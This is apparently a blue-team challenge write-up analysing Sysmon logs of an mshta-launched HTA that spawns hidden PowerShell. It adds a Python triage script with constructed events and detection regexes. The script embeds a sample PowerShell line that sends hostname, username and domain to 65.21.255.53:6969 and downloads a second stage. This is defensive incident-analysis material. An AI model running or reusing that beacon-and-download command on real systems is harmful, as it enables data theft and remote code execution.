You are provided with Sysmon logs from a compromised endpoint. Analyse the logs to find out the steps and techniques used by the attacker.
https://blueteamlabs.online/home/challenge/log-analysis-sysmon-fabcb83517

We can see mshta.exe, a known LOLBAS binary (MITRE ATT&CK T1218.005, Mshta), executing a local HTA file (updater.hta), which in turn spawned a heavily obfuscated PowerShell script. The script hid its window, bypassed the execution policy, and created a WebClient object to send system information (hostname, username, domain, etc.) to the attacker's server. It then downloaded and executed a second-stage payload from a remote URL (http://65.21.255.53:6969/index.php), allowing the attacker to run additional code on the system. In Sysmon terms this is a chain of Event ID 1 (process creation) records, with mshta.exe as the parent of powershell.exe, followed, where network logging is enabled, by an Event ID 3 (network connection) record from the PowerShell process to 65.21.255.53 on port 6969.

The attacker uses the Invoke-WebRequest cmdlet to download the malware from port 6969. A non-standard high port like this is likely chosen to avoid detection or bypass firewall rules keyed on typical web ports, but it cuts both ways: egress filtering that only permits outbound 80/443 would block it, and a scripting host such as powershell.exe opening a connection to an unusual port is a strong detection pivot on its own, independent of the IP.
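To show how the chain above (mshta.exe launching updater.hta, then a hidden, policy-bypassing PowerShell that decodes to a WebClient beacon and an Invoke-WebRequest download from 65.21.255.53:6969) can be pulled out of Sysmon data programmatically, here is an added triage script. It is not part of the challenge or of the original writeup, and the events it runs over are constructed: only the IP, port, URL path and the updater.hta filename come from the analysis above; the process GUIDs, user path, the explorer.exe events and the exact stage-one script text are assumptions made to have something realistic to parse. The script assumes Sysmon events already flattened to their EventData fields (for example from EVTX converted to JSON), reconstructs the parent chain via ProcessGuid, decodes a -EncodedCommand payload (base64 of UTF-16LE, which is how PowerShell's -enc works), and flags the script-host-to-unusual-port connection.

```python
"""Added example: rebuild the mshta -> PowerShell -> C2 chain from flattened
Sysmon Event ID 1 (process create) and Event ID 3 (network connect) records.
All sample events below are constructed for this example, not taken from the
challenge log; only the IP, port, URL and updater.hta come from the writeup."""
import base64
import re


def _encode_ps(script: str) -> str:
    """PowerShell -EncodedCommand expects base64 over the UTF-16LE script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Assumed stage-one script: beacon host/user/domain, then fetch stage two.
_STAGE1 = (
    "$c=New-Object Net.WebClient;"
    "$c.DownloadString('http://65.21.255.53:6969/index.php?h='+$env:COMPUTERNAME"
    "+'&u='+$env:USERNAME+'&d='+$env:USERDOMAIN);"
    "Invoke-WebRequest -Uri 'http://65.21.255.53:6969/index.php' -UseBasicParsing"
)

# Constructed events (GUIDs, user path and the explorer.exe records are made up).
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessGuid": "{guid-explorer}", "ParentProcessGuid": "{guid-userinit}",
     "Image": r"C:\Windows\explorer.exe", "ParentImage": r"C:\Windows\System32\userinit.exe",
     "CommandLine": r"C:\Windows\explorer.exe"},
    {"EventID": 1, "ProcessGuid": "{guid-mshta}", "ParentProcessGuid": "{guid-explorer}",
     "Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" C:\Users\user\Downloads\updater.hta'},
    {"EventID": 1, "ProcessGuid": "{guid-ps}", "ParentProcessGuid": "{guid-mshta}",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "powershell.exe -w hidden -ep bypass -enc " + _encode_ps(_STAGE1)},
    {"EventID": 3, "ProcessGuid": "{guid-ps}",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "DestinationIp": "65.21.255.53", "DestinationPort": 6969, "Protocol": "tcp"},
    {"EventID": 3, "ProcessGuid": "{guid-explorer}",  # benign-looking control record
     "Image": r"C:\Windows\explorer.exe",
     "DestinationIp": "203.0.113.10", "DestinationPort": 443, "Protocol": "tcp"},
]

SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe",
                "pwsh.exe", "rundll32.exe", "regsvr32.exe"}
COMMON_WEB_PORTS = {80, 443}
ENC_RE = re.compile(r"-e(?:nc|ncodedcommand|c)?\s+([A-Za-z0-9+/=]{20,})", re.I)
URL_RE = re.compile(r"https?://[^\s'\"]+", re.I)
PS_ARG_RULES = [  # switches visible in the raw command line
    (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), "hidden window"),
    (re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I), "execution policy bypass"),
    (ENC_RE, "encoded command"),
]
PS_BODY_RULES = [  # behaviours visible only after decoding the script body
    (re.compile(r"New-Object\s+(?:System\.)?Net\.WebClient", re.I), "WebClient created"),
    (re.compile(r"\$env:(?:COMPUTERNAME|USERNAME|USERDOMAIN)", re.I), "host/user enumeration"),
    (re.compile(r"Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile", re.I), "download primitive"),
]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str):
    """Return the plaintext of a -EncodedCommand payload, or None if absent/invalid."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_process(ev: dict) -> list:
    """Findings for one Event ID 1 record."""
    findings = []
    image, parent = basename(ev["Image"]), basename(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")
    if image == "mshta.exe" and re.search(r"\.hta\b", cmd, re.I):
        findings.append("mshta.exe launched a local HTA (T1218.005)")
    if image in ("powershell.exe", "pwsh.exe"):
        if parent in SCRIPT_HOSTS:
            findings.append(f"powershell spawned by {parent}")
        findings += [label for rx, label in PS_ARG_RULES if rx.search(cmd)]
        body = decode_encoded_command(cmd) or cmd  # fall back to the raw line
        findings += [label for rx, label in PS_BODY_RULES if rx.search(body)]
        findings += [f"contacts {u}" for u in sorted(set(URL_RE.findall(body)))]
    return findings


def analyze_network(ev: dict) -> list:
    """Findings for one Event ID 3 record: script host talking to an odd port."""
    image, port = basename(ev["Image"]), int(ev["DestinationPort"])
    if image in SCRIPT_HOSTS and port not in COMMON_WEB_PORTS:
        return [f"{image} connected to {ev['DestinationIp']}:{port} (non-standard port)"]
    return []


def process_chain(guid: str, procs: dict) -> str:
    """Walk ParentProcessGuid links back to the oldest logged ancestor."""
    chain, seen = [], set()
    while guid in procs and guid not in seen:
        seen.add(guid)
        chain.append(basename(procs[guid]["Image"]))
        guid = procs[guid].get("ParentProcessGuid")
    return " > ".join(reversed(chain))


def triage(events: list) -> dict:
    """Map ProcessGuid -> {chain, findings} for every process with a finding."""
    procs = {e["ProcessGuid"]: e for e in events if e["EventID"] == 1}
    report = {}
    for e in events:
        found = analyze_process(e) if e["EventID"] == 1 else (
            analyze_network(e) if e["EventID"] == 3 else [])
        if found:
            entry = report.setdefault(e["ProcessGuid"],
                                      {"chain": process_chain(e["ProcessGuid"], procs), "findings": []})
            entry["findings"].extend(found)
    return report


if __name__ == "__main__":
    for guid, entry in triage(SAMPLE_EVENTS).items():
        print(guid, entry["chain"])
        for f in entry["findings"]:
            print("   -", f)
```

Run as-is to see the two flagged processes and their ancestry; to use it on real data, feed it Sysmon events exported with their EventData fields flattened to the same keys. The decode step matters because the -w hidden / -ep bypass switches are visible in the raw command line, but the WebClient beacon, the $env: enumeration and the Invoke-WebRequest to 65.21.255.53:6969 only appear after the -enc payload is decoded.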